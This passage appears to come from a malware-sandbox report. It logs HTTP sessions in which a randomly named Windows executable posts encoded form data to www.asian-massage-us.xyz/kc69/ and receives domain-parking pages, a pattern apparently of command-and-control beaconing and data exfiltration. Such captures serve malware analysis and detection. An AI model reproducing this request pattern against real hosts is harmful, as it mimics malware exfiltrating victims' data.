                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                              Aug 30, 2024 09:18:23.106020927 CEST1236INData Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                              Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                              Aug 30, 2024 09:18:23.106033087 CEST1236INData Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                              Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                              Aug 30, 2024 09:18:23.106039047 CEST672INData Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                              Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                              Aug 30, 2024 09:18:23.106045008 CEST1236INData Raw: 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 39 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63
                              Data Ascii: -6.8 25.2h3z"/> <path class="st2" d="M970 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M960 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M950 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M940 282.4h-3l-6.8 25.2h3z"/> <pa
                              Aug 30, 2024 09:18:23.106050014 CEST1236INData Raw: 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 34 30 20 32 38 32 2e 34 68 2d
                              Data Ascii: class="st2" d="M750 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M740 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M730 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M720 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M710 282
                              Aug 30, 2024 09:18:23.106056929 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 2d 34 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 36 30 2e 32 20 32 38 32 2e 34
                              Data Ascii: "st2" d="M-470.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-460.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-450.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-440.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
                              Aug 30, 2024 09:18:23.106060982 CEST104INData Raw: 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73
                              Data Ascii: 3z"/> <path class="st2" d="M-260.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-250.2 282
                              Aug 30, 2024 09:18:23.106072903 CEST1236INData Raw: 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                              Data Ascii: .4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h
                              Aug 30, 2024 09:18:23.106081963 CEST1236INData Raw: 73 74 32 22 20 64 3d 22 4d 2d 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33
                              Data Ascii: st2" d="M-40.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                              Aug 30, 2024 09:18:23.107877970 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                              Data Ascii: h3z"/> <path class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <p


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.549731199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:28.273420095 CEST745OUTPOST /kc69/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.asian-massage-us.xyz
                              Origin: http://www.asian-massage-us.xyz
                              Referer: http://www.asian-massage-us.xyz/kc69/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2b 43 68 30 6d 4f 64 71 70 36 63 48 54 6b 46 66 7a 57 36 69 6d 30 78 6a 73 67 47 6c 44 32 50 79 46 2b 75 4b 59 6d 74 73 5a 52 31 78 2f 6d 64 2b 71 46 48 6d 56 31 2f 68 48 6d 5a 38 76 4d 54 54 2f 4c 4b 61 62 6a 2b 64 51 62 7a 42 6a 66 6d 34 4d 32 6a 59 35 34 77 38 58 48 52 36 62 33 77 79 77 61 30 75 6f 2b 37 6f 38 4b 4b 39 65 35 48 47 68 61 63 39 56 37 76 68 30 51 44 4a 79 2b 45 52 5a 73 32 59 31 63 54 6b 66 45 34 66 38 42 41 64 43 6b 77 5a 48 35 67 61 37 62 32 65 52 6d 33 6f 36 67 64 2f 51 45 57 42 49 32 35 46 5a 38 30 71 6f 42 39 6e 62 6f 52 70 68 4f 73 3d
                              Data Ascii: KxdLgNi=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZH5ga7b2eRm3o6gd/QEWBI25FZ80qoB9nboRphOs=
                              Aug 30, 2024 09:18:28.752444983 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:18:28 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1146
                              x-request-id: f73c24fc-6fda-4fe7-b349-c7950b8fae09
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                              set-cookie: parking_session=f73c24fc-6fda-4fe7-b349-c7950b8fae09; expires=Fri, 30 Aug 2024 07:33:28 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:18:28.752469063 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjczYzI0ZmMtNmZkYS00ZmU3LWIzNDktYzc5NTBiOGZhZTA5IiwicGFnZV90aW1lIjoxNzI1MDAyMz


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.549732199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:30.817337036 CEST765OUTPOST /kc69/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.asian-massage-us.xyz
                              Origin: http://www.asian-massage-us.xyz
                              Referer: http://www.asian-massage-us.xyz/kc69/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 72 79 46 62 4b 4b 5a 6e 74 73 63 52 31 78 74 47 64 6e 6b 6c 48 78 56 31 7a 70 48 6b 64 38 76 4d 48 54 2f 4b 36 61 62 77 57 65 54 72 7a 44 72 2f 6d 41 43 57 6a 59 35 34 77 38 58 48 31 41 62 33 49 79 77 71 6b 75 70 66 37 72 30 71 4b 2b 4f 5a 48 47 72 36 63 6d 56 37 76 66 30 52 4f 55 79 34 41 52 5a 70 4b 59 31 4a 2f 6e 55 45 35 31 78 68 42 54 53 46 52 4a 4b 66 73 55 30 4b 48 68 47 6b 75 52 2f 57 77 56 4b 6d 65 70 62 57 56 39 4a 76 38 64 35 78 63 4f 42 4c 42 5a 2f 5a 36 6a 48 5a 79 34 44 79 35 78 41 6d 43 58 36 61 65 5a 64 38 65 58
                              Data Ascii: KxdLgNi=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWV9Jv8d5xcOBLBZ/Z6jHZy4Dy5xAmCX6aeZd8eX
                              Aug 30, 2024 09:18:31.267853022 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:18:30 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1146
                              x-request-id: 5439dbea-e482-4013-8a0f-74c9354e1dc1
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                              set-cookie: parking_session=5439dbea-e482-4013-8a0f-74c9354e1dc1; expires=Fri, 30 Aug 2024 07:33:31 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:18:31.267877102 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQzOWRiZWEtZTQ4Mi00MDEzLThhMGYtNzRjOTM1NGUxZGMxIiwicGFnZV90aW1lIjoxNzI1MDAyMz


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.549733199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:33.370430946 CEST1782OUTPOST /kc69/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.asian-massage-us.xyz
                              Origin: http://www.asian-massage-us.xyz
                              Referer: http://www.asian-massage-us.xyz/kc69/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 6a 79 45 74 47 4b 59 45 31 73 66 52 31 78 75 47 64 36 6b 6c 48 4a 56 30 62 74 48 6b 52 47 76 4b 44 54 2f 70 69 61 4b 52 57 65 49 62 7a 44 6e 66 6d 37 4d 32 69 41 35 34 67 67 58 48 46 41 62 33 49 79 77 76 67 75 75 4f 37 72 32 71 4b 39 65 35 48 53 68 61 64 6f 56 37 32 6e 30 52 62 6a 7a 4c 49 52 59 4a 36 59 34 66 72 6e 5a 45 34 54 69 52 41 4f 53 46 63 54 4b 5a 49 32 30 4b 44 62 47 6d 2b 52 39 77 78 33 51 32 53 2b 59 6c 74 39 4c 38 77 6a 6d 57 77 30 43 39 4d 7a 7a 36 61 56 4a 61 36 70 49 46 70 31 43 53 66 4e 6d 75 65 44 51 4a 48 38 6c 63 59 39 42 75 2b 68 35 54 46 34 78 2f 43 42 44 32 42 41 42 58 38 55 6b 38 37 61 55 65 31 51 43 4c 32 38 66 4c 6b 4c 59 42 62 77 38 76 76 43 59 35 69 4c 6c 72 74 2b 49 55 44 61 43 31 37 2b 41 51 56 64 6d 4a 43 55 30 6d 44 4f 33 42 48 70 65 4b 2f 66 7a 56 30 33 41 4f 34 42 54 2f 2f 2b 52 7a 52 70 75 63 4c 64 70 2f 57 62 76 36 [TRUNCATED]
                              Data Ascii: KxdLgNi=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFjyEtGKYE1sfR1xuGd6klHJV0btHkRGvKDT/piaKRWeIbzDnfm7M2iA54ggXHFAb3IywvguuO7r2qK9e5HShadoV72n0RbjzLIRYJ6Y4frnZE4TiRAOSFcTKZI20KDbGm+R9wx3Q2S+Ylt9L8wjmWw0C9Mzz6aVJa6pIFp1CSfNmueDQJH8lcY9Bu+h5TF4x/CBD2BABX8Uk87aUe1QCL28fLkLYBbw8vvCY5iLlrt+IUDaC17+AQVdmJCU0mDO3BHpeK/fzV03AO4BT//+RzRpucLdp/Wbv6pJh39BYcN2WqrM/A1DMUB12kWG4CqjbGzygb8r8I1Fdn4H758pk6iD9BEVl99SQPgdEbzFeZxJWnmHWXCfDQpNoRGrMiBJrwNxy5S53pB4TfTdtHatdJnEaJ4t/255krEiB0a7MzajlgJIOMTVmdUWJ5Zja1K8uTp4TZ+tYT2UPUzNz+AEMZLR/R9nza7wsRDiL8bvHrR6ZFuZBXQlktuwQi3gxKA4+gIw8Poa3dSubDG/Fr8JvxDsIA1+5I/2ZLZ3I6PIynbCp4+OxXqCaHcludkiqsPbZ7JYif1wDlzBJv+qh1x9aZRdZLvPsaxwBm16m7EWoIu0wod9n/x0ndCCLd2EgjLjE7gdKsq4Nwgc7y2dujAQ/1+CaMBhrsUaN2Kqx4K/NOKOXoAr67Fz1grSJgCEwDMxBp7P9MCQfFoq4dEiDqtEZ/Q0X1VvZZZdSCzyPhILBGNhEIsMBEZGUQakhH4OKWiiFRZeRhdIw7C8X4RDmxsg1ZKyZnqA3K/h/RQkApm8qK5qRqsAIE49vUBCAsrWbYgQyJ7ec7vgCo1mwFMlZsc6gM/mINXP/yZWZ2LvUjs80VDf4ODoMX7zVX9ylBjV1AnTadOyL8IZOW7B3DCchc9Bmc8kPVeFxPmjQ59goxyjTHdSlpIWcGI5wWe9cauvKU1e4P4y [TRUNCATED]
                              Aug 30, 2024 09:18:33.818547964 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:18:33 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1146
                              x-request-id: 219b2972-fccc-4def-bc41-a2473e45c78e
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                              set-cookie: parking_session=219b2972-fccc-4def-bc41-a2473e45c78e; expires=Fri, 30 Aug 2024 07:33:33 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
